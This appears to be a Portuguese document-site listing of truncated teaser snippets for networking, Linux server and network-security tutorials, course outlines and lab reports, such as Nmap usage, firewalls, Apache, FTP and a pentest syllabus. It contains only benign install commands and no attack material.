O Nmap - Network Mapper é uma ferramenta de código aberto para exploração de rede e auditoria de segurança. O Nmap - Network Mapper é uma ferramenta de código aberto para exploração de rede e auditoria de segurança. Ela foi desenvolvida para escanear rapidamente redes amplas, embora também funcione muito bem

Leia mais

Prof. Roberto Franciscatto 4º Semestre - TSI - CAFW. Free Powerpoint Templates Page 1

Prof. Roberto Franciscatto 4º Semestre - TSI - CAFW. Free Powerpoint Templates Page 1 Segurança na Web Capítulo 6: Firewall Prof. Roberto Franciscatto 4º Semestre - TSI - CAFW Page 1 Introdução Qual a função básica de um firewall? Page 2 Introdução Qual a função básica de um firewall? Bloquear

Leia mais

INSTALAÇÃO PRINTERTUX Tutorial

INSTALAÇÃO PRINTERTUX Tutorial INSTALAÇÃO PRINTERTUX Tutorial 2 1. O Sistema PrinterTux O Printertux é um sistema para gerenciamento e controle de impressões. O Produto consiste em uma interface web onde o administrador efetua o cadastro

Leia mais

Tutorial para Instalação do Ubuntu Server 10.04

Tutorial para Instalação do Ubuntu Server 10.04 Tutorial para Instalação do Ubuntu Server 10.04 Autor: Alexandre F. Ultrago E-mail: ultrago@hotmail.com 1 Infraestrutura da rede Instalação Ativando o usuário root Instalação do Webmin Acessando o Webmin

Leia mais

Usando o Nmap. A instalação do Nmap é bem simples. Após obter o código fonte execute os comandos abaixo: tar xjvpf nmap-3.48.tar.bz2 cd nmap-3.

Usando o Nmap. A instalação do Nmap é bem simples. Após obter o código fonte execute os comandos abaixo: tar xjvpf nmap-3.48.tar.bz2 cd nmap-3. Usando o Nmap Este artigo irá explicar como instalar e utilizar algumas funções do Nmap. Todos os comandos foram testados com a versão 3.48 do Nmap. É bem provável que alguns comandos não funcionem em

Leia mais

Ping. O programa Ping, opção de record route e de timestamp.

Ping. O programa Ping, opção de record route e de timestamp. Ping O programa Ping, opção de record route e de timestamp. Ping Testa se um outro terminal se encontra atingível O programa envia uma mensagem ICMP echo request para um terminal e espera por receber uma

Leia mais

Tarefas práticas da disciplina

Tarefas práticas da disciplina Tarefas práticas da disciplina Objetivo: As atividades têm por objetivo consolidar os conceitos de redes de computadores, aplicando os conceitos teóricos de forma a desenvolver no estudante a capacidade

Leia mais

Redes de Computadores I Conceitos Básicos (6 a. Semana de Aula)

Redes de Computadores I Conceitos Básicos (6 a. Semana de Aula) Redes de Computadores I Conceitos Básicos (6 a. Semana de Aula) Prof. Luís Rodrigo lrodrigo@lncc.br http://lrodrigo.lncc.br 2013.09 v2 2013.09.10 (baseado no material de Jim Kurose e outros) Arquiteturas

Leia mais

NOMES: Leonardo Claro Diego Lage Charles Tancredo Márcio Castro

NOMES: Leonardo Claro Diego Lage Charles Tancredo Márcio Castro NOMES: Leonardo Claro Diego Lage Charles Tancredo Márcio Castro O MySQL Cluster é versão do MySQL adaptada para um ambiente de computação distribuída, provendo alta disponibilidade e alta redundância utilizando

Leia mais

1. Capturando pacotes a partir da execução do traceroute

1. Capturando pacotes a partir da execução do traceroute Neste laboratório, iremos investigar o protocolo IP, focando o datagrama IP. Vamos fazê-lo através da analise de um trace de datagramas IP enviados e recebidos por uma execução do programa traceroute (o

Leia mais

Protocolos, DNS, DHCP, Ethereal e comandos em Linux

Protocolos, DNS, DHCP, Ethereal e comandos em Linux Redes de Computadores Protocolos, DNS, DHCP, Ethereal e comandos em Linux Escola Superior de Tecnologia e Gestão Instituto Politécnico de Bragança Março de 2006 Endereços e nomes Quaisquer duas estações

Leia mais

Configurando DDNS no Stand Alone

Configurando DDNS no Stand Alone Configurando DDNS no Stand Alone Abra o seu navegador de internet e acesse o endereço http://www.advr.com.tw(ou, http://59.124.143.151 ). Clique em Register para efetuar o cadastro de um novo grupo.(foto

Leia mais

Fernando Albuquerque - fernando@cic.unb.br ADMINISTRAÇÃO TCP/IP. Fernando Albuquerque 061-2733589 fernando@cic.unb.br

Fernando Albuquerque - fernando@cic.unb.br ADMINISTRAÇÃO TCP/IP. Fernando Albuquerque 061-2733589 fernando@cic.unb.br ADMINISTRAÇÃO TCP/IP Fernando Albuquerque 061-2733589 fernando@cic.unb.br Protocolos TCP/IP - Tópicos Introdução IP Endereçamento Roteamento UDP, TCP Telnet, FTP Correio DNS Web Firewalls Protocolos TCP/IP

Leia mais

Tutorial, Instalando e configurando o apache no linux.

Tutorial, Instalando e configurando o apache no linux. Tutorial, Instalando e configurando o apache no linux. Olá galera, esse tutorial ensinará passo passo, como subir um servido WEB no linux. Estou usando atualmente, o Linux ubuntu Hardy Heron 8.04 primeira

Leia mais

Instalação do serviço de FTP com o Proftpd

Instalação do serviço de FTP com o Proftpd Tutorial - Proftpd Instalação do serviço de FTP com o Proftpd O Proftpd é um dos mais utilizados servidores de FTP da plataforma Linux. Sua instalação é rápida e fácil. Para instalar o pacote, digite o

Leia mais

Passos Preliminares: Acessando a máquina virtual via ssh.

Passos Preliminares: Acessando a máquina virtual via ssh. CIn/UFPE Sistemas de Informação Redes de Computadores Professor: Kelvin Lopes Dias Monitor: Edson Adriano Maravalho Avelar {kld,eama@cin.ufpe.br Instalando o APACHE, PHP (PHPADMIN), MySQL. Este tutorial

Leia mais

Aula prática. Objetivo IPCONFIG. Prof. Leandro Pykosz Leandro@sulbbs.com.br. Informa a configuração atual de rede da máquina;

Aula prática. Objetivo IPCONFIG. Prof. Leandro Pykosz Leandro@sulbbs.com.br. Informa a configuração atual de rede da máquina; Aula prática Prof. Leandro Pykosz Leandro@sulbbs.com.br Objetivo Nesta aula, você aprenderá a utilizar alguns utilitários de rede que podem ajudá-lo a identificar problemas na rede. No windows existem

Leia mais

Guia de Prática. Windows 7 Ubuntu 12.04

Guia de Prática. Windows 7 Ubuntu 12.04 Guia de Prática Windows 7 Ubuntu 12.04 Virtual Box e suas interfaces de rede Temos 04 interfaces de rede Cada interface pode operar nos modos: NÃO CONECTADO, que representa o cabo de rede desconectado.

Leia mais

Procedimentos para Configuração de Redirecionamento de Portas

Procedimentos para Configuração de Redirecionamento de Portas 1 Procedimentos para Configuração de Redirecionamento de Portas O DIR 635 tem duas opções para liberação de portas: Virtual server: A opção Virtual Server permite que você defina uma única porta pública

Leia mais

(In)segurança Utilizando Software Livre. Maycon Maia Vitali mayconmaia@yahoo.com.br

(In)segurança Utilizando Software Livre. Maycon Maia Vitali mayconmaia@yahoo.com.br (In)segurança Utilizando Software Livre Maycon Maia Vitali mayconmaia@yahoo.com.br Agenda Introdução Quem sou eu? Porque aprender sobre (in)segurança? Ferramentas nmap Scanner de rede iptables Firewall

Leia mais

Entregar um relatório respondendo as questões propostas e principais observações feitas durante a prática (para os itens 1, 3, 4, 5, 6 e 7).

Entregar um relatório respondendo as questões propostas e principais observações feitas durante a prática (para os itens 1, 3, 4, 5, 6 e 7). EN3611 Segurança de Redes Prof. João Henrique Kleinschmidt Prática 2 Certificados digitais e Linux-TCP/IP Entregar um relatório respondendo as questões propostas e principais observações feitas durante

Leia mais

Redes de Computadores I Conceitos Básicos

Redes de Computadores I Conceitos Básicos Redes de Computadores I Conceitos Básicos (6 a. Semana de Aula) Prof. Luís Rodrigo lrodrigo@lncc.br http://lrodrigo.lncc.br 2011.02 v1 2011.09.05 (baseado no material de Jim Kurose e outros) Arquiteturas

Leia mais

Linux Network Servers

Linux Network Servers NFS A sigla NFS, do inglês Network File System, significa Sistema de Arquivos de Rede. Através de programas específicos no servidor e nas máquinas clientes, podemos fazer com que esses clientes acessem

Leia mais

Ementa Completa. Introdução

Ementa Completa. Introdução Ementa Completa Introdução Mercado de Segurança da Informação (Pentest) Preparação Entender o cliente Definir o escopo e limitações Janela de testes Contato Responsabilidades Autorização Non-Disclosure

Leia mais

Tarefas práticas da disciplina

Tarefas práticas da disciplina Tarefas práticas da disciplina Objetivo: As atividades têm por objetivo consolidar o conhecimento de redes de computadores adquirido em aula, aplicando os conceitos teóricos com vistas a desenvolver no

Leia mais

Faculdade de Tecnologia Senac Goiás Segurança da Informação. Guilherme Pereira Carvalho Neto. Portas e Serviços

Faculdade de Tecnologia Senac Goiás Segurança da Informação. Guilherme Pereira Carvalho Neto. Portas e Serviços Faculdade de Tecnologia Senac Goiás Segurança da Informação Guilherme Pereira Carvalho Neto Portas e Serviços Goiânia 2015 Relatório de portas e serviços na rede Relatório produzido com base em dados colhidos

Leia mais

Laboratório - Configuração de um endereço de gerenciamento do switch

Laboratório - Configuração de um endereço de gerenciamento do switch Laboratório - Configuração de um endereço de gerenciamento do switch Topologia Tabela de Endereçamento Dispositivo Interface Endereço IP Máscara de Sub-Rede Gateway Padrão Objetivos S1 VLAN 1 192.168.1.2

Leia mais

Virtualização - Montando uma rede virtual para testes e estudos de serviços e servidores

Virtualização - Montando uma rede virtual para testes e estudos de serviços e servidores Virtualização - Montando uma rede virtual para testes e estudos de serviços e servidores Este artigo demonstra como configurar uma rede virtual para ser usada em testes e estudos. Será usado o VirtualBox

Leia mais

Curso Pentest Profissional

Curso Pentest Profissional Ementa Oficial do Curso Pentest Profissional Capítulo 01 Introdução Mercado de Segurança da Informação (Pentest) Preparação Entender o cliente Definir o escopo e limitações Janela de testes Contato Responsabilidades

Leia mais

Ferramentas GPL para segurança de redes. www.tchelinux.org Palestrante: Vanderlei Pollon

Ferramentas GPL para segurança de redes. www.tchelinux.org Palestrante: Vanderlei Pollon Ferramentas GPL para segurança de redes Palestrante: Vanderlei Pollon 2º Seminário de Software Livre Tchelinux Edição Porto Alegre 01/12/2007 Sobre o palestrante Nome: Vanderlei Pollon Graduação: Matemática

Leia mais

Manual de Instalação e Configuração do SQL Express

Manual de Instalação e Configuração do SQL Express Manual de Instalação e Configuração do SQL Express Data alteração: 19/07/11 Pré Requisitos: Acesse o seguinte endereço e faça o download gratuito do SQL SRVER EXPRESS, conforme a sua plataforma x32 ou

Leia mais

LISTA DE COMANDOS DO LINUX 1

LISTA DE COMANDOS DO LINUX 1 LISTA DE COMANDOS DO LINUX 1 Comandos para manipulação de diretório 1. ls Lista os arquivos de um diretório. 2. cd Entra em um diretório. Você precisa ter a permissão de execução para entrar no diretório.

Leia mais

Passos Preliminares: Acessando a máquina virtual via ssh.

Passos Preliminares: Acessando a máquina virtual via ssh. CIn/UFPE Sistemas de Informação Redes de Computadores Professor: Kelvin Lopes Dias Monitor: Edson Adriano Maravalho Avelar {kld,eama}@cin.ufpe.br Instalando o POSTFIX. Este tutorial irá mostrar como instalar

Leia mais

Linux Networks Servers

Linux Networks Servers FTP O protocolo FTP ( File Transfer Protocol ) é um protocolo para transferências de arquivos amplamente utilizado na internet devido a sua facilidade de implementação e simplicidade de uso. Durante este

Leia mais

Configurando um Servidor de Arquivos SAMBA. Prof. Armando Martins de Souza E-mail: armandomartins.souza@gmail.com

Configurando um Servidor de Arquivos SAMBA. Prof. Armando Martins de Souza E-mail: armandomartins.souza@gmail.com Configurando um Servidor de Arquivos SAMBA. Prof. Armando Martins de Souza E-mail: armandomartins.souza@gmail.com Porque usar o Servidor Samba Server? Compartilhamento de arquivos; Servidor de arquivos;

Leia mais

Roteiro para Prática 01 GNS e comandos da Cisco

Roteiro para Prática 01 GNS e comandos da Cisco Ponto de Presença da RNP na Bahia PoP-BA/RNP Universidade Federal da Bahia Departamento de Ciência da Computação Curso de Extensão em Administração de Redes Instrutor: Italo Valcy Roteiro para Prática

Leia mais

FTP Protocolo de Transferência de Arquivos

FTP Protocolo de Transferência de Arquivos FTP Protocolo de Transferência de Arquivos IFSC UNIDADE DE SÃO JOSÉ CURSO TÉCNICO SUBSEQUENTE DE TELECOMUNICAÇÕES! Prof. Tomás Grimm FTP - Protocolo O protocolo FTP é o serviço padrão da Internet para

Leia mais

Maker Planet www.makerplanet.com Manual do Usuário

Maker Planet www.makerplanet.com Manual do Usuário Maker Planet www.makerplanet.com Manual do Usuário Atenção: Este é o rascunho inicial deste documento, visite o Maker Planet.COM (HTTP://www.makerplanet.com/) para obter as atualizações deste documento.

Leia mais

GUIA DE INÍCIO RÁPIDO NHS NOBREAK MANAGER 4.0 TOPOLOGIA MÍNIMA DE REDE PARA A INSTALAÇÃO E USO DO SOFTWARE COM GPRS

GUIA DE INÍCIO RÁPIDO NHS NOBREAK MANAGER 4.0 TOPOLOGIA MÍNIMA DE REDE PARA A INSTALAÇÃO E USO DO SOFTWARE COM GPRS GUIA DE INÍCIO RÁPIDO NHS NOBREAK MANAGER 4.0 TOPOLOGIA MÍNIMA DE REDE PARA A INSTALAÇÃO E USO DO SOFTWARE COM GPRS CONFIGURAÇÃO DO GPRS 1. Entre no site da NHS na página de homologação do NHS NOBREAK

Leia mais

CA Nimsoft Monitor. Guia do Probe Monitoramento de conectividade de rede. net_connect série 3.0

CA Nimsoft Monitor. Guia do Probe Monitoramento de conectividade de rede. net_connect série 3.0 CA Nimsoft Monitor Guia do Probe Monitoramento de conectividade de rede net_connect série 3.0 Aviso de copyright do CA Nimsoft Monitor Este sistema de ajuda online (o Sistema ) destina-se somente para

Leia mais

Instalação do IBM SPSS Modeler Server Adapter

Instalação do IBM SPSS Modeler Server Adapter Instalação do IBM SPSS Modeler Server Adapter Índice Instalação do IBM SPSS Modeler Server Adapter............... 1 Sobre a Instalação do IBM SPSS Modeler Server Adapter................ 1 Requisitos de

Leia mais

Projeto e Instalação de Servidores Servidores Linux Aula 6 Firewall e Proxy

Projeto e Instalação de Servidores Servidores Linux Aula 6 Firewall e Proxy Projeto e Instalação de Servidores Servidores Linux Aula 6 Firewall e Proxy Prof.: Roberto Franciscatto Introdução FIREWALL Introdução Firewall Tem o objetivo de proteger um computador ou uma rede de computadores,

Leia mais

Ferramenta para gerenciamento de impressão CURUPIRA

Ferramenta para gerenciamento de impressão CURUPIRA #20 Ferramenta para gerenciamento de impressão CURUPIRA VITEC Versão 1.0 Agosto/2007 1 Revisões Versão Data Descrição 1.0.0 03/08/2007 Elaboração do Manual. Página 2 de 18 Índice 1 REVISÕES... 2 2 PRÉ-REQUISITOS...

Leia mais

LABORATÓRIO XII. PORTSCAN & FOOTPRINTING Documento versão 0.1. Paulo Henrique Moreira Gurgel #5634135

LABORATÓRIO XII. PORTSCAN & FOOTPRINTING Documento versão 0.1. Paulo Henrique Moreira Gurgel #5634135 LABORATÓRIO XII PORTSCAN & FOOTPRINTING Documento versão 0.1 Paulo Henrique Moreira Gurgel #5634135 Orientado pela Professora Kalinka Regina Lucas Jaquie Castelo Branco Outubro / 2012 Laboratório XII Footprinting

Leia mais

Roteiro 3: Sistemas Linux arquivos e diretórios

Roteiro 3: Sistemas Linux arquivos e diretórios Roteiro 3: Sistemas Linux arquivos e diretórios Objetivos Detalhar conceitos sobre o sistema operacional Linux; Operar comandos básicos de sistemas Linux em modo Texto; Realizar a manutenção de arquivos

Leia mais

Instalando servidor Apache

Instalando servidor Apache Instalando servidor Apache Apache é um software livre de código aberto que corre mais de 50% dos servidores web do mundo. Para instalar o apache, abra um terminal e digite o comando: 1- # yum install httpd

Leia mais

O essencial do comando mysqladmin, através de 18 exemplos

O essencial do comando mysqladmin, através de 18 exemplos O essencial do comando mysqladmin, através de 18 exemplos Elias Praciano O mysqladmin é uma ferramenta de linha de comando que vem junto com a instalação do servidor MySQL e é usada por administradores

Leia mais

Tecnologia de Redes. Protocolo ICMP

Tecnologia de Redes. Protocolo ICMP Volnys B. Bernal (c) 1 Tecnologia de Redes Protocolo ICMP Internet Control Message Protocol Volnys Borges Bernal volnys@lsi.usp.br http://www.lsi.usp.br/~volnys Volnys B. Bernal (c) 2 Agenda Protocolo

Leia mais

Sistema Operacional Unidade 5 - Iniciando o modo texto. QI ESCOLAS E FACULDADES Curso Técnico em Informática

Sistema Operacional Unidade 5 - Iniciando o modo texto. QI ESCOLAS E FACULDADES Curso Técnico em Informática Sistema Operacional Unidade 5 - Iniciando o modo texto Curso Técnico em Informática SUMÁRIO INTRODUÇÃO... 3 OPERANDO EM MODO TEXTO... 3 Abrindo o terminal... 3 Sobre o aplicativo Terminal... 3 AS CORES

Leia mais

CA Nimsoft Monitor Snap

CA Nimsoft Monitor Snap CA Nimsoft Monitor Snap Guia de Configuração do Monitoramento de conectividade de rede net_connect série 2.9 Aviso de copyright do CA Nimsoft Monitor Snap Este sistema de ajuda online (o Sistema ) destina-se

Leia mais

Manual de Instalação e Configuração do Sistema Cali LAB View

Manual de Instalação e Configuração do Sistema Cali LAB View Manual de Instalação e Configuração do Sistema Cali LAB View www.cali.com.br - Manual de Instalação e Configuração do Sistema Cali LAB View - Página 1 de 29 Índice INSTALAÇÃO E CONFIGURAÇÃO (FIREBIRD E

Leia mais

A. Sniffer de redes Wireshark

A. Sniffer de redes Wireshark EN3611 Segurança de Redes Prof. João Henrique Kleinschmidt Prática Wireshark e nmap Sniffer de rede e Scanner de portas Entregar um relatório contendo introdução, desenvolvimento e conclusão. A seção desenvolvimento

Leia mais

Protocolos Telnet e SSH. Professor Leonardo Larback

Protocolos Telnet e SSH. Professor Leonardo Larback Protocolos Telnet e SSH Professor Leonardo Larback Protocolo Telnet O modelo de referência TCP/IP inclui um protocolo simples de terminal remoto: Telnet. O telnet é tanto um programa quanto um protocolo,

Leia mais

Você pode testar se está tudo OK, abrindo um navegador no Debian Linux e acessando qualquer site.

Você pode testar se está tudo OK, abrindo um navegador no Debian Linux e acessando qualquer site. Você pode testar se está tudo OK, abrindo um navegador no Debian Linux e acessando qualquer site. Foi necessário configurar esse segundo adaptador, porque talvez seja necessário fazer o download de alguma

Leia mais

Manual de Instalação INSTALAÇÃO E CONFIGURAÇÃO DE PROGRAMAS

Manual de Instalação INSTALAÇÃO E CONFIGURAÇÃO DE PROGRAMAS Manual de Instalação INSTALAÇÃO E CONFIGURAÇÃO DE PROGRAMAS Lista de Programas - Java versão 6.0 ou superior JDK (Java Development Kit) /Setups/java/jdk-6u3-windows-i586-p O JDK já vem com o JRE (Java

Leia mais

Guia de Conectividade Worldspan Go Res! A V A N Ç A D O

Guia de Conectividade Worldspan Go Res! A V A N Ç A D O Guia de Conectividade Worldspan Go Res! A V A N Ç A D O Í n d i c e Considerações Iniciais...2 Rede TCP/IP...3 Produtos para conectividade...5 Diagnosticando problemas na Rede...8 Firewall...10 Proxy...12

Leia mais

Faculdade de Tecnologia SENAC Goiás Segurança da Informação. Aldo Brito da Costa Filho Levi Souza Matheus Marçal Matheus Oliveira

Faculdade de Tecnologia SENAC Goiás Segurança da Informação. Aldo Brito da Costa Filho Levi Souza Matheus Marçal Matheus Oliveira Faculdade de Tecnologia SENAC Goiás Segurança da Informação Aldo Brito da Costa Filho Levi Souza Matheus Marçal Matheus Oliveira Relatório estatístico sobre o ataque MITM Goiânia 2015 1 Aldo Brito Levi

Leia mais

Redes. Pablo Rodriguez de Almeida Gross

Redes. Pablo Rodriguez de Almeida Gross Redes Pablo Rodriguez de Almeida Gross Conceitos A seguir serão vistos conceitos básicos relacionados a redes de computadores. O que é uma rede? Uma rede é um conjunto de computadores interligados permitindo

Leia mais

Fundamentos dos protocolos internet

Fundamentos dos protocolos internet Fundamentos dos protocolos internet - 2 Sumário Capítulo 1 Fundamentos dos protocolos internet...3 1.1. Objetivos... 3 1.2. Mãos a obra...4 Capítulo 2 Gerenciando... 14 2.1. Objetivos... 14 2.2. Troubleshooting...

Leia mais

Senha Admin. Nessa tela, você poderá trocar a senha do administrador para obter acesso ao NSControl. Inicialização

Senha Admin. Nessa tela, você poderá trocar a senha do administrador para obter acesso ao NSControl. Inicialização Manual do Nscontrol Principal Senha Admin Nessa tela, você poderá trocar a senha do administrador para obter acesso ao NSControl. Inicialização Aqui, você poderá selecionar quais programas você quer que

Leia mais

Linux System Administration 455

Linux System Administration 455 Linux System Administration 455 Nome do curso que é modificado no Slide Mestre Slide 1 2 Nome do curso que é modificado no Slide Mestre Slide 1 3 Os serviços de rede podem ser divididos em três tipos básicos:

Leia mais

INTRODUÇÃO: 1 - Conectando na sua conta

INTRODUÇÃO: 1 - Conectando na sua conta INTRODUÇÃO: Com certeza a reação da maioria dos que lerem esse mini manual e utilizarem o servidor vão pensar: "mas porque eu tenho que usar um console se em casa eu tenho uma interface gráfica bonito

Leia mais

GUIA DE INSTALAÇÃO. Plataforma Windows. Relatório Técnico Versão 0.1 (201305032030) Leandro Gomes da Silva, Tiago França Melo de Lima

GUIA DE INSTALAÇÃO. Plataforma Windows. Relatório Técnico Versão 0.1 (201305032030) Leandro Gomes da Silva, Tiago França Melo de Lima Laboratório de Engenharia e Desenvolvimento de Sistemas LEDS/UFOP Universidade Federal de Ouro Preto UFOP GUIA DE INSTALAÇÃO Plataforma Windows Relatório Técnico Versão 0.1 (201305032030) Leandro Gomes

Leia mais

Manual de Instalação do Curso Informática Instrumental

Manual de Instalação do Curso Informática Instrumental Manual de Instalação do Curso Informática Instrumental As informações contidas no presente documento foram elaboradas pela International Syst. Qualquer dúvida a respeito de seu uso ou relativa a informações

Leia mais

Guia de Configuração de uma VPN funcional

Guia de Configuração de uma VPN funcional Guia de Configuração de uma VPN funcional Guia de Configuração do Wingate VPN Por que eu quero uma VPN? Uma VPN, por definição, cria uma rede privada e segura através de um meio inseguro. Esta facilidade

Leia mais

Análise de tráfego em redes TCP/IP com tcpdump

Análise de tráfego em redes TCP/IP com tcpdump Análise de tráfego em redes TCP/IP com tcpdump João Eriberto Mota Filho João Pessoa, PB, 28 maio 2015 Sumário A análise de tráfego A estrutura de um protocolo O protocolo IP O protocolo TCP O protocolo

Leia mais

RIT Roteiro de Instalação Técnica

RIT Roteiro de Instalação Técnica 1. DADOS DO EQUIPAMENTO Nome do Equipamento Modelo Fabricante Nº RIT TCR RBG 200 ITAUTEC RIT113 Responsável pela elaboração Data da elaboração Washington Oliveira 11/07/2012 Aprovador Data da aprovação

Leia mais

Integração entre o IBM HTTP SERVER, APACHE WEB Server e IBM Websphere Application Server

Integração entre o IBM HTTP SERVER, APACHE WEB Server e IBM Websphere Application Server Integração entre o IBM HTTP SERVER, APACHE WEB Server e IBM Websphere Application Server Índice Resumo sobre este documento... 3 Integrando o IBM HTTP Server com o IBM WebSphere Application Server... 3

Leia mais

Manual de Instalação: Agente do OCS Inventory NG

Manual de Instalação: Agente do OCS Inventory NG Manual de Instalação: Agente do OCS Inventory NG Abril 2013 Sumário 1. Agente... 1 2. Onde instalar... 1 3. Etapas da Instalação do Agente... 1 a. Etapa de Instalação do Agente... 1 b. Etapa de Inserção

Leia mais

Utilização da técnica de Port Knocking para negação de acesso indevido e. ocultação de portas TCP / UPD em servidores Linux.

Utilização da técnica de Port Knocking para negação de acesso indevido e. ocultação de portas TCP / UPD em servidores Linux. Utilização da técnica de Port Knocking para negação de acesso indevido e ocultação de portas TCP / UPD em servidores Linux Diego Pereira do Nascimento Curso de Especialização em Redes e Segurança de Sistemas

Leia mais

Acesso Re sso R moto

Acesso Re sso R moto Acesso Remoto Introdução Em um ambiente de rede, é sempre importante salientar o uso de ferramentas que possam facilitar procedimentos de manutenção, gerenciamento e execução de procedimentos em uma determinada

Leia mais

Sistemas de Informação Processamento de Dados

Sistemas de Informação Processamento de Dados Sistemas de Informação Processamento de Dados Ferramentas e serviços de acesso remoto VNC Virtual Network Computing (ou somente VNC) é um protocolo desenhado para possibilitar interfaces gráficas remotas.

Leia mais

Guia para atualização de Firmware dos racks RIO1608-D & RIO3224-D. (Firmware 1.50)

Guia para atualização de Firmware dos racks RIO1608-D & RIO3224-D. (Firmware 1.50) Guia para atualização de Firmware dos racks RIO1608-D & RIO3224-D (Firmware 1.50) PRECAUÇÕES 1. O usuário assume total responsabilidade pela atualização. 2. Atualize o Firmware de uma unidade por vez.

Leia mais

UNIVERSIDADE ESTADUAL DO OESTE DO PARANÁ CENTRO DE CIÊNCIAS EXATAS E TECNOLÓGICAS CURSO DE BACHARELADO EM INFORMÁTICA

UNIVERSIDADE ESTADUAL DO OESTE DO PARANÁ CENTRO DE CIÊNCIAS EXATAS E TECNOLÓGICAS CURSO DE BACHARELADO EM INFORMÁTICA UNIVERSIDADE ESTADUAL DO OESTE DO PARANÁ CENTRO DE CIÊNCIAS EXATAS E TECNOLÓGICAS CURSO DE BACHARELADO EM INFORMÁTICA Tutorial de Instalação da Grade Computacional Gustavo Mantovani Orlando Luiz Pelosi

Leia mais

FACULDADE DE TECNOLOGIA DE OURINHOS SEGURANÇA DA INFORMAÇÃO. Felipe Luiz Quenca Douglas Henrique Samuel Apolo Ferreira Lourenço Samuel dos Reis Davi

FACULDADE DE TECNOLOGIA DE OURINHOS SEGURANÇA DA INFORMAÇÃO. Felipe Luiz Quenca Douglas Henrique Samuel Apolo Ferreira Lourenço Samuel dos Reis Davi FACULDADE DE TECNOLOGIA DE OURINHOS SEGURANÇA DA INFORMAÇÃO Felipe Luiz Quenca Douglas Henrique Samuel Apolo Ferreira Lourenço Samuel dos Reis Davi ENDIAN FIREWALL COMMUNITY 2.5.1 OURINHOS-SP 2012 HOW-TO

Leia mais

GUIA DE INSTALAÇÃO NETDEEP SECURE COM VIRTUAL BOX

GUIA DE INSTALAÇÃO NETDEEP SECURE COM VIRTUAL BOX GUIA DE INSTALAÇÃO NETDEEP SECURE COM VIRTUAL BOX NETDEEP SECURE COM VIRTUAL BOX 1- Visão Geral Neste manual você aprenderá a instalar e fazer a configuração inicial do seu firewall Netdeep Secure em um

Leia mais

Para funcionamento do Netz, alguns programas devem ser instalados e alguns procedimentos devem ser seguidos. São eles:

Para funcionamento do Netz, alguns programas devem ser instalados e alguns procedimentos devem ser seguidos. São eles: Instalação do Netz Para funcionamento do Netz, alguns programas devem ser instalados e alguns procedimentos devem ser seguidos. São eles: Instalação do Java SE 6, que pode ser instalado através da JDK.

Leia mais